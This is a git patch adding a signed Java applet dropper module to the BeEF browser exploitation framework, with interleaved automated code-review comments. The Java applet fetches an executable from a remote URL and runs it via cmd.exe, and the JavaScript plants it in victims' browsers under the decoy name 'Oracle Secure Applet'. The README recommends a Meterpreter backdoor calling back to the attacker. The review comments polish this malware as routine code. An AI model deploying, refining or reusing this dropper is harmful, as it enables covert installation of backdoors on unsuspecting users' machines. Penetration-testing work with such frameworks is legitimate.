From b280d099f835ea50fd2158d86d4868feb940d8e8 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Tue, 8 Oct 2013 17:02:02 +0100
Subject: [PATCH] From antisnatchor with love. New module: Signed Java Applet dropper (win only for now).
---
 .../signed_applet_dropper/README.txt | 22 +++++
 .../signed_applet_dropper/applet/SM.class | Bin 0 -> 276 bytes
 .../signed_applet_dropper/applet/SM.java | 13 +++
 .../applet/SignedApplet.class | Bin 0 -> 2817 bytes
 .../applet/SignedApplet.jar | Bin 0 -> 3782 bytes
 .../applet/SignedApplet.java | 87 ++++++++++++++++++
 .../signed_applet_dropper/command.js | 28 ++++++
 .../signed_applet_dropper/config.yaml | 15 +++
 .../signed_applet_dropper/module.rb | 30 ++++++
 9 files changed, 195 insertions(+)
 create mode 100644 modules/exploits/local_host/signed_applet_dropper/README.txt
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SM.class
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SM.java
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/command.js
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/config.yaml
 create mode 100755 modules/exploits/local_host/signed_applet_dropper/module.rb
diff --git a/modules/exploits/local_host/signed_applet_dropper/README.txt b/modules/exploits/local_host/signed_applet_dropper/README.txt
new file mode 100644
index 000000000..3148891d4
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/README.txt
@@ -0,0 +1,22 @@
+--- How to use this module ---
+-- antisnatchor:
+ - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included)
+ - tested with IE8 on XP SP3, and IE10 on Win7
+ - tested with JRE 1.6.x and 1.7.x
+
+ - I advise you to recompile/re-sign the applet yourself, the following are the required steps to compile and self-sign the applet.
+NOTE: Best results are obtained signing the applet with a valid Code Signing certificate.
+
+ - Ideally the dropper is a packed backdoor (Meterpreter?) that connects back to your server (for instance a Metasploit multi/handler).
+
+1. compile the two classes
+javac SignedApplet.java SM.java
+
+2. create a JAR
+jar cvf SignedApplet.jar SignedApplet.class SM.class
+
+3. generate a keystore to self-sign the applet
+keytool -keystore tmp -genkey
+
+4. sign the applet
+jarsigner -keystore tmp signedAppletCmdExec.jar mykey
diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SM.class b/modules/exploits/local_host/signed_applet_dropper/applet/SM.class new file mode 100755 index 0000000000000000000000000000000000000000..e5e180b79d9ca74153b71df78bfc8c830df341ec GIT binary patch literal 276 zcmZ9G!D_-l5QhIrOj1*;XAd5FOM7UbSH+9q$&^CG`I z1_iFw5X6ua*J-#OH)t?0ERfPrgCP}Z4JJn9VzdUQ<3<&hT-+pY?^Th}Fa}%0CJYHU z8tSDf6Ip?qH7tWGMNYueumX93eHv}J0^E&q^&!~7-#d9j2 zm(ji;#ft(j3B0VJI&BW;M-@bpHyQhkM8>d36aAiR*`w_W#IR*wpLa6~RQWAycsKHE z+8MVqj*(WN>`@T3Y|B#+h&AuxVzZMr6)Z_wwz)MwHf*{(jNuG-LL23=P5wDvTHNm$ zslB~M)>jiGfmetQff0CB;58;p@8*6pmG^kNF4lZvcml68n2o7S*|OH}bM-2DX8@`&U;oSvE8uK&X|rabn18uZwtJm<6XQb z@V<^iIIQ5bh46IbtxVc<6`Ue9am$H&W7)LDqJE&`L+Rur9MSQy^c0LU6=`UPjt;pY zoLt;C#!Tj*<0y70sOs<4@d-Xvp!=R|(@X5!o|GXS(=mZb1uJ}o@tBO|73rn~HH z-ea*$!w>zl%3U5Qq0qSS#^*$7MJ2O8R!*sI+rSJ1V1aoCr+ZopGvC4bq?gDWd*;v*s+v@ z9TjrTX(u`wHN8H=W!XK+n>Dc$IeikEljF9z-%C0+yOdqV%zeg{TD8}2$$&AOBg3Rp)z(mBf+4HUcE9`Q2aE8?6 z%q)}k9HzX;bCS-u>25Z1?9oWh^!nN1uH_x*HEd&4qH@MO^YgXsa>UfnJ5ZWba$jSl zcBvWIt(Ac>zhn$&S^4?`g|rZ!Rmq0%y*144%`LL83$pPDNOf$mqq&REaVEmF1lL_% z(qQ#SCZFTPtWISdnQ*|#b5hoq%FY1#IA+WJ%g7pIdrmCPERLman}3VWveHI|eHWhX z#_f6Av&QI9V+m&#^%YF~DwntEHz>!fg0&~Zbq+&Gg_N1g@xmNW-zgj=RiS42JiEKRPP#%Z%=B1{T=tq0M-nYWzA zR?sA8U&(}`(T&OzZlJx0WdjokOrask@Rs)$v0`BT6dJb{aXJ;@DV)(3EMnzA5z&E$ z;1rssu&S*(9K=^@Td1`mRKS@RihA)HLWfY>P~8v;)QbXEA3FY50}(k(iZ$yCSQ~6# zek8g42qUP14F@qkWy;-%P_E>v35&6ct1}txYOKXsxEN~)L5$~`(T5i7!8#0KJ%-VW zQN*zq3I1<$Hm#k5EdO!pp`|#2$9YL80!e{hfvp1D1o{N72L8bkyGv{H?78T(El<{{k-L%I8yy^m$R~c+Vk(A{!`0Z{*^hmQR^Oh%d6E zGst!_OW-2rw1Jv7XlTcI*ofVv{U9m7k1*Xq%HKm~JVm0vN0J{V#XlmBM@hI(SepqX zeN^iZ{1=A>cJh}9R&@}%06Da4hL#)XU;flZ+9uH+X=YzY5e`gZ<3eWEkbfFKi%4~y L_jdDM6|VUYR!=S8@OvFgG zWJ_cpdGHY5c)stw^7MZ1`#aaUuJiw2*YBL`zR!K``*#~7Y3V>z43yF0sjESC0wBuT zP|Fk{u4kkzVTdr&)7CY$*RSJO(wT88(+H5|86wQeae_)zHKK7H5}-IF0hxMPkbUpRDLIiz|i1LcfU?vfP zJR-5OatSgAZWM?hmd}SbCDWaUFXZFupyq5tq$?pZ1b4eSix$??hx1W)#LJfk#F!Wf 
zpJXnVv=T1|guPO&H6w77s_`G)B7Uq%J{`Zi05C?LV!$p3jTcj_cuSea|IyAf|FF{> zsbvmDYda6THwsk;0j5fBQ49T$lz=fd2~@nWZ(S zeqWC(BblX$Ad{fjQTG`6;tEHvB_-`}xUQ{0l=U`GEYIs}G`^uUOL1d@Z2305H{6R< z=y#l8?mi z9(GQx?{f~D6^C0Y1^9dVIA+MM=al>7w(P#)-_RP zEdogD1P~3P3=G5&h?t+j*wJ8Yzj?JJEj%$~8}_ueni2NIpNGt|5h8!C!%20|Pk7Hy zlG>*+D2SR*Hwc-kA}^%^zfdz|+^&9FphH~jG}wf}$Pg;7Z$>5UiQdwW#Q3Mq__NG+ z`LW_zSy_mz@1x%14GV(q0BJR7(N}zPGe34U@`iigqwZpue+z@lN*`3Pxg?5%hgh1{ z;X3Q@6TW?+YdAI5;){_Nv;R^pZY)lMk069Md<&gjyQ+Tbw600-`uO`e^lxh~)0-z8 zpzbqH)Y;RESx7%RWKPCX7ik^Jt_?h~HZF%Ec&vh~2SNpxs2diWgLZ?CT#SRlI zApUhypyl%{oW=4_q04r?gtIDKF|Y_}0~EvJS+fPzy8A=@#adOj8`U)51^^UR_d5X< zpX?^4lwR3;M~y{qWF?_T)(>sB%a-gL*&4(jp#AUJ;J#Ff#vKkYjR7D$f8Zj)BCQ*P z?7*qOY*NX$uG*)vR%V|s!e2qyII9v!Q!V9QR#UV7Yj-1y_4pnMnMsx1%rPgse~D~k z%o0ssSBvsj%yGWvd+UydcL|oMAZELDEBh7^FV13sXT>nxkV|~+TK~$s?~PSY^pr1L z4O)zIdPtDZP|@EA=;_x=P<6+CuA9uA2Ul+ou93(nG#&5tu1W@cpgUq=&2=G0r|yBm zY(Q$grkuoG+^1YM&z)L6QGl7N1*`m{tfjqoPQhjUuk2RFO5dF3`{-kK)U?WNef#SJ z>kj-5`RP0B$mq*UGWmsAyNC3&yn<(PlGD;Bh6DW}#Kr?1eT`nxedHqL_x{MT+K7&@ z&BNieGRULF>zQ+}iX2&a1|TxoGz)^EflQ5;RNx@od^L!~k4GC<>fK(T! zo5Ky$#O#W}u&v!x&Bzp^J)c8ksr?^AuknunDJ!0L96mBo63ZzDJ=MX5pEOid5_BgY zPt|V;m63|>S3*5}M@2>ZH<|LJs3_dO@heM}{zg82dFcE0F19uZH#a9+FQ~N>#?upj zo$&$C45UIT^h?0R3f8OVSuru>eb96d~>>v$HM&! 
z0+Gl`!cOjNyYBKI9CU3B6*B*cR(hZ1xAWRJ#d9D-PVH#B_Z!v7v>dn@?xb0jGYbh; zfwYW@zIh3$49&}9V+<~&SNpR}68^(l{dDDywUiiG?rpm&L9xinIFwcAFQj85=mEfG zSQ7QuvX1tJ7kQkOAcf$cknfTLZt4a6H>Pvj3?bj$>%!Pw;<|6cC&MO+8Z{!7;FC|3 z0H;eEZ-+JZpsIGt8c}v`t&yipl}lzWDwofm0moo*EHTK<$6-R7iBaVGNPAP|7qbfB zfxbjGb>nXCeyt{*~#U- zRIjj=L~8-?m1Zzbe8K~a>kzG)y;qkY113h8|1lQFvjT(NfIJk&1}uNA$G`ErBh%am z=h&asZgLRRrI7&g((rFYw!IKb9eht~cj=plw>R#q8VQKQ_m-my^|N0>g;MlVC&aiV zKG?F3+IgTAv!p+V-|72MuGzDU)6ij-6)q8JA`-5PG?A(k`g5aYojz>}PI2IF_bAC< zax?8|#-Z8|U~>)g<)%Z#EAq%&my&_*r$~Cwc-4yM8d=DyMvJ@Z+GOpUkzV!49=lR@ zBUvk+(DDN~FQ5K)(r8g`zG&r~Kp1%OjoTkf+P?~gU7^9&y&OdCR34?J9 z@xy@;A3uGPdmf^;XSPjF%H`JWL&?VCkG_4hKw0Zx%{!i+5TqF z+0sh15yrBy!n>ObO;SnqHcXa67H7B**>$VDwJ^{$$lz(+d{ksHe(A@`K>B^oRYfts ziM;}^!=p~yS?nvG-1_k2<&B_cD>koU`krcy)bcuT;g3rRCm$w?J0Y*J>)m*riYlYk=oXoA=TI!#xh z_FhZ^e+pJm*++V>m-xM-`G~cL04ukuu0L1QxK5LR^j&cJ1hG-ai)V5T8$3uz9`;&E zTE7JlJuIjyyxKvu%XqFOBAnI}iy=(d#ORrX%plVzC@XB26TOTDF&gC4CS?{#C zLO&Cj{i+^^IFB0nDd@Mzx`X8tg$ye!JZl%98O2Jb3!KK65`LG`nX7 zlc`0BY@I$Asa&Sb&OraHo3JTm>YG!j1E@%3o+-%eTr^Ymqa{|P{{`vt3lJrXUHR&M zMg&J49A+{Ml8o70=(&!^v=_d(@QiihON=!EmH12`E$@nodY=exypqF{y#G8mYm$BeBOULIO%eTMQtXP@w zTZXMOlwn03A7(@1dI&m3N0vyNWMqw%_j!!#R>xe;lb$rhlY^`6`ct-*&P2|GsggDh zV)wP^WT`pN8k)YEXtH#F%Q@D?E|HaP>s|p0<>;-Mq863(p z&X{hNhL=W(P7zSaKFW9yq419H0}5#QM8Y!|I@{4%`55__HTi88lWhGd9xLmcFELy% z`c#~4PA!we=?dQT)7#t_;919>|8^8(zUuvS&^)`rZYZF=F>MoS!v_7H`|Me>(B{Bg z{Mt|%y~0E1-ib52AG*i-Mb|4f27JuBYaoQX8!9#qV zT%|aw9J1X`zs4p^lYPcXJ|QiTjGBW#^ZIn3klw`fmhdO(vq0Hc}t}_PnoRi)O%+vlZoV}*COJkr10M*{8E2m>tYm4Dn z54ktPS=U?#>wG;GBNTKofKB#06ar1BvllCrM=|&`GzcaZFNFaQ2(bZiIaZa|#Z)1J zW1I8U^WOz(4GQBwto84#bc93+5jeg%ZYV_?B%UoI={r29$!zx2w##K^H;`2`ce3I4HqIY~XfeZ3QL@z0~9Db#=0 kF2D0n`t>+^enFMxS1cJL0hHLIqN1k^56TUwvL1i^4=A2cegFUf literal 0 HcmV?d00001 diff --git a/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java new file mode 100755 index 000000000..697f5d59b --- /dev/null 
+++ b/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java 
@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.applet.*;
+import java.awt.*;
+import java.io.*;
+import java.util.*;
+import java.net.URL;
+
+public class SignedApplet extends Applet {
+
+ public static String debug = "false";
+ public static String bin_url = "";
+ public static String bin_path = "";
+ public static boolean download = false;
+
+ public void init(){
+ bin_url = (String)getParameter("url");
+ String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
+ bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";
+
+ // grab operating system -> not used atm
+ // TODO: make the applet compatible also with Linux/OSX
+ String os = System.getProperty("os.name").toLowerCase();
+ execute();
+ }
+
+ public SignedApplet(){
+ super();
+ SecurityManager sm = new SM();
+ System.setSecurityManager(sm);
+ return;
+ }
+
+ public static boolean download(){
+ boolean success = false;
+ try{
+ URL url = new URL(bin_url);
+ InputStream is = url.openStream();
+ BufferedInputStream isbuf = new BufferedInputStream(is);
+ File bin_out = new File(bin_path);
+ OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
+ byte[] buf = new byte[1024];
+ for (;;){
+ int bs = isbuf.read(buf);
+ if (bs <= 0) break;
+ out.write(buf, 0, bs);
+ }
+ out.flush();
+ out.close();
+ is.close();
+ success = true;
+ return success;
+ }catch(Exception e){
+ return success;
+ }
+ }
+
+ public static String execute() {
+ String result = "";
+ String command = "";
+ try{
+ boolean downloadOk = download();
+ System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
+ result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";
+
+ if(downloadOk){
+ // TODO: make the applet compatible also with Linux/OSX
+ command = "cmd.exe /c \"" + bin_path + "\"";
+ Process p = Runtime.getRuntime().exec(command); + p.waitFor(); + /// delete dropped binary + new File(bin_path).delete(); + result += "\n\nExecution OK."; + }else{ + //downloading of dropper failed, catch error.. + result = "Download error."; + } + }catch (Exception e) { + result = "Exception!!!: \n"; + } + return result; + } +} diff --git a/modules/exploits/local_host/signed_applet_dropper/command.js b/modules/exploits/local_host/signed_applet_dropper/command.js new file mode 100755 index 000000000..3cd74f3b0 --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/command.js @@ -0,0 +1,28 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedApplet.jar'; + var applet_name = '<%= @applet_name %>'; + var dropper_url = '<%= @dropper_url %>'; + var ie_only = '<%= @ie_only %>'; + + function attach(){ + beef.dom.attachApplet('signed_applet', applet_name, 'SignedApplet.class', + null, applet_archive, [{'url':dropper_url}]); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet added to the DOM.'); + } + + if(ie_only == "on"){ + if(beef.browser.isIE()){ + attach(); + } + }else{ + attach(); + } +}); diff --git a/modules/exploits/local_host/signed_applet_dropper/config.yaml b/modules/exploits/local_host/signed_applet_dropper/config.yaml new file mode 100755 index 000000000..4110ef9ec --- /dev/null +++ b/modules/exploits/local_host/signed_applet_dropper/config.yaml 
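Review bot: The `os` local in `init()` and the static fields `debug` and `download` are never read anywhere in the new class, so they are dead code; either remove them or fold the `// grab operating system -> not used atm` comment into the TODO just below it so the intent is recorded once. The constructor replaces the process-wide SecurityManager with `new SM()` without a word on what that class enforces, and SM.java's hunk is not readable in this view; a comment such as `// SM: custom SecurityManager installed JVM-wide; see SM.java for the policy it applies` on the `System.setSecurityManager(sm)` line would let a reader judge the intent. The trailing `return;` in the constructor is redundant and reads as a leftover.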
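Review bot: `applet_name` and `dropper_url` are inserted into single-quoted JS literals via `'<%= @applet_name %>'` and `'<%= @dropper_url %>'` with no escaping, so an option value containing a quote or backslash breaks the generated script; encode each value on the Ruby side (a JSON-encoded string literal is the usual form) before it reaches the template. In the `ie_only == "on"` branch a non-IE browser reaches neither `attach()` nor any `beef.net.send`, so the command never reports and `post_execute` has nothing to save; an `else` sending a short status string would make that outcome visible. What `<%= @ie_only %>` renders for the checkbox is not shown here, so the `"on"` comparison is assumed to match what the UI submits.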
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ signed_applet_dropper:
+ enable: true
+ category: ["Exploits", "Local Host"]
+ name: "Signed Applet Dropper"
+ description: "Injects a Signed Java Applet (compiled with Java 1.6.0 in order to be compatible with every JRE from 1.6.0 to latest 1.7) that downloads a dropper and executes it.
Currently works only on Windows.

Internet Explorer is the only browser that doesn't implement Click to Play for plugins, that's what the IE only checkbox is meant for."
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["All"]
diff --git a/modules/exploits/local_host/signed_applet_dropper/module.rb b/modules/exploits/local_host/signed_applet_dropper/module.rb
new file mode 100755
index 000000000..1cc350aa5
--- /dev/null
+++ b/modules/exploits/local_host/signed_applet_dropper/module.rb
@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Signed_applet_dropper < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
+
+ end
+
+ def self.options
+ @configuration = BeEF::Core::Configuration.instance
+ beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+ return [
+ {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
+ {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},
+ {'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' },
+
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
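Review bot: `beef_host` in `self.options` is computed from `beef.http.public` / `beef.http.host` but never used, so the two configuration reads are dead code; drop the line, or use the value in the `dropper_url` default if that was the intent. `pre_send` spells out `BeEF::Core::NetworkStack::Handlers::AssetHandler.instance` three times in a row; binding the instance to a local once makes the three `bind` calls readable at a glance, and the explicit `return` before the options array is not idiomatic Ruby. The stray blank line before `end` in `pre_send` and the trailing empty element before `]` look like leftovers.
```ruby
def pre_send
  handler = BeEF::Core::NetworkStack::Handlers::AssetHandler.instance
  handler.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
  handler.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
  handler.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
end
# … unchanged: self.options, post_execute …
```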